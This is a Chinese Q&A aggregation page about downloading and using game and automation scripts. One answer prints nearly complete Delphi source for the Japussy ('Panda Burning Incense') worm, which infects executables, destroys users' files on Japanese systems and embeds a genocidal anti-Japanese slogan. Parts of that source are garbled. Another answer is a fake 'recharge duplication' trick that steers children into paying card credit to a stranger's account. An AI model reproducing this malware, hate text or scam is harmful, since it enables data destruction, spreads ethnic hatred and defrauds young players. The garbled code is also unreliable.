当前位置:首页 » 编程软件 » 老白脚本下载

老白脚本下载

发布时间: 2022-04-28 21:49:01

① 在百度网盘,下好吃鸡脚本以后,如何在GG修改器运行脚本 在线等挺急的😘

在网络网盘下,好吃鸡脚本以后如何在GG修改器上运行脚本都可以的,只要说根据程序设定,没有毛病就可以下载

② 请问大神们,我想弄一个自动完成软件任务的脚本怎么弄

这个最好不要弄。这个脚本其实也可以下载使用,但是软件能检测出你使用脚本刷金币,可能短时间内没检测出你使用脚本,但是时间一长就能检查出来,会封你的号的。

③ 在哪能下载到脚本,我自己能做脚本吗

您好!哪里下载看需求,一般找相关论坛或者贴吧,脚本说白了就是用动态语言比如Python写的程序,自然可以自己写,不过您需要一定的编程基础,不过现在也有些比较方便的软件可以根据需求自动生成。

④ 脚本病毒下载

熊猫烧香:
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = E8; //PE文件主图标的大小744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = 444444; //感染标记
//无用码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stDCall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文版操作系统标记
{ 判断是否为windows 9.X版本 }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procere CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procere ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procere FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procere SendMail;
begin
//邮件终止
end;
{ 感染PE文件 }
procere InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
K:\YUANK Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to 8 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //小于10240的文件不被感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := 444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入无用码后删除 }
procere SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //获取文件大小
i := 0;
Randomize;
Max := Random(15); //写入无用码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入无用码,将文件彻底破坏!
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除
except
end;
end;
{ 获得可以写入的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
K:\YUANK Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':\';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procere LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '\', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procere InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':\', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序并开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end.
CMD命令 shutdown -a //取消计算机中病毒后的倒记时关机。

⑤ 就是那种cs的挂机脚本,指定要挂YY在某频道才能用,那个怎么弄的

现在最好用的就是呱呱,也是最安全的,不会封号
第一步
下载呱呱和YY
第二布,注册YY账号
第三步
登陆yy,进入7775频道
第四步
打开呱呱,具体设置软件参数和挂机类型
第五步
登陆游戏,进入房间,按F11开始挂机即可
够明白了吧

⑥ 手机怎么安装脚本

一、android应用启动服务执行脚本 1 如何写服务和脚本 在android源码根目录下有/device/tegatech/tegav2/init.rc文件相信大家对这个文件都不陌生(如果不明白就仔细研读下android启动流程)。如果在该脚本文件中添加诸如以下服务: service usblp_test /data/setip/init.usblpmod.sh oneshot disabled 注解:每个设备下都会有自己对应的init.rc,init.设备名.rc脚本文件。oneshot disabled向我们说明了在系统启动的时候这个服务是不会自动启动的。并且该服务的目的是执行/data/setip/init.usblpmod.sh脚本。脚本的内容你可以随便写,只要符合shell语法就可以了,比如脚本可以是简单的设置eth0: # ! /system/bin/sh //脚本的开头必须这样写。 ifconfig eth0 172.16.100.206 netmask 255.255.0.0 up//设置ip的命令

首先,你的手机要获取root权限,然后再下载一个脚本精灵,授予脚本精灵权限,然后运行脚本精灵,拉开后在软件右上角有一个录像装置的图标,然后点击,打开小窗口再次点击,就可进入脚本录制,你点击游戏那里,他就录制哪里,录制完之后按下音量下键,就停止录制然后你输入相关的名称进行保存,然后进入游戏运行你刚才录制的这个脚本,他就会一直重复你刚才操作的过程。

⑦ 苹果手机用什么代替脚本精灵,按键精灵这些软件

苹果手机没有可以代替脚本精灵,按键精灵的软件。

1.只能越狱,然后下载这些软件。

首先要明白苹果下载软件如果没有越狱就只能在app store里下载软件,这种类似改变系统设置的软件苹果官网是可能授权的,这会影响系统的稳定性。所以想要下类似软件还要先越狱。

2.脚本精灵是一款模拟手机触摸和按键的工具,通过这款工具,可以运行各种自定义脚本,从而代替人手在手机上进行各种重复的操作。目前可应用的功能有:手机游戏重复关卡操作、微信打招呼等。

3.按键精灵是一款模拟鼠标键盘动作的软件。通过制作脚本,可以让按键精灵代替双手,自动执行一系列鼠标键盘动作。按键精灵简单易用,不需要任何编程知识就可以作出功能强大的脚本。只要在电脑前用双手可以完成的动作,按键精灵都可以替代完成。

⑧ QQ三国自动刷三国币脚本在哪里下载

这是不可能的我的理由:“为什么出跑行脚,楼主要搞明白哦,是为了防止挂,
这个系统的特点是,每次进去都不一样的洞口,
请问,挂,有智慧吗?怎么可能自己分辨洞口嘛
再说了就算到了行脚馆,挂可不会答题的把O(∩_∩)O~所以我建议你去官网看看,自己跑行脚,一次就可以跑到的,下面我给你方法,仔细看哦一,给你个网址
http://act3.games.qq.com/games/676/show.php?id=9239二,怕木马?没事,我教你
看好哦
1,进入官网
2,鼠标下拉到我给你的图的这个位置,看到了吗?
3,在玩家交流那块区域的,记者点击一下
4,第5个标题《教你怎样刷行脚》
这个就是了
嘿嘿,图都给你了,找到应该不难哦
O(∩_∩)O~好好加油!!!
游戏愉快哈~~

⑨ 小花仙代刷器脚本下载网站

可以的,我其实是淘米从前的工作人员,我冒着危险告诉大家,就是为了抵制乱收费!真正的刷法如下:
最新刷米币的方法(这是最新改版后的方法,以前的方法不能用了,老手都知道了吧,新手自己看)如何让10元或30块钱(以30元为例)变成更多呢,如果你连10-30块钱的点卡都买不起,那就别想在小花仙里混了。方法是利用官方账号495192642,495192642是淘米号刷米币帐号是个叔叔)方法掌握在少数人手中,给小朋友们,建议大家也别到处宣扬。如何冲10块钱让变成1万米币或者更多,具体方法如下: 在米币的冲值页面下,隐藏了一个叫495192642的资料处理中心的数据文件,当然它是没有办法直接访问的,我们知道小花仙是新游戏,所以它是我国的做的漏洞多2013年的冲值代理官方帐户495192642,它是用来记录冲过的冲值卡的,当然它是没有办法直接访问的,不过我们首先,你要准备一张没有用过的冲值卡,随便多少钱都可以啊。
然后进入网站登陆点摩尔庄园充值页面充值 米米号 注意!!:先不能直接填你的账号,要填495192642,这是小花仙游戏官方帐号.重新输入帐户,同样填495192642充值卡卡号 填你准备的充值卡卡号及充值卡密码,填你准备的冲值卡密码, 请输入附加码.照样填上. 然后点确定,开始冲值.附加码等等的都填写好以后点击下一步然后第3步然后点击下一步!!跳转页面会提示您系统出错!(或者成功,不过没关系,只是一个显示错误罢了,那证明你失败了。)好了,开始跳转页面了,因为495192642是系统官方帐号!所以系统会告诉你给账号495192642冲值失败,接下来是关键了:现在刷新页面,系统就会提示出错,然后按后退键,返回冲值页面好了,接下来重要步骤:
账号填你自己的账号,按照通常的步骤进行冲值,系统提示冲值成功!最最关键的步骤来了:
刷新页面,用你最快的方法刷新页面多少次就冲了多少倍点卡,如果你冲的是10元的点卡,你刷新了10次,那么就相当于你冲了100块的点卡。如果你不会点刷新,那么按住F5键也是一样的,F5键就是刷新的快捷键,你可以先试一下。总之你刷新几次。那么你的点卷就反复几倍了
多试几次就会成功30元成功几率是百分之100哦 人格担保 绝对真实

⑩ 跪求:CS脚本在哪下载怎么安装

我觉得你的家人最强,他们最爱你.

网络游戏是个烧钱的东西,醒悟吧,多做点实事.

兄弟,我是能挽救一个就挽救一个. 回来吧!!!回头吧!!

孩子!!!!!!!!

热点内容
破解互联网密码多少钱 发布:2025-04-22 14:49:32 浏览:746
非框架梁箍筋加密 发布:2025-04-22 14:47:58 浏览:492
解除休息限制的密码是多少 发布:2025-04-22 14:45:13 浏览:459
scratch少儿编程课程 发布:2025-04-16 17:11:44 浏览:642
荣耀x10从哪里设置密码 发布:2025-04-16 17:11:43 浏览:369
java从入门到精通视频 发布:2025-04-16 17:11:43 浏览:89
php微信接口教程 发布:2025-04-16 17:07:30 浏览:312
android实现阴影 发布:2025-04-16 16:50:08 浏览:795
粉笔直播课缓存 发布:2025-04-16 16:31:21 浏览:348
机顶盒都有什么配置 发布:2025-04-16 16:24:37 浏览:213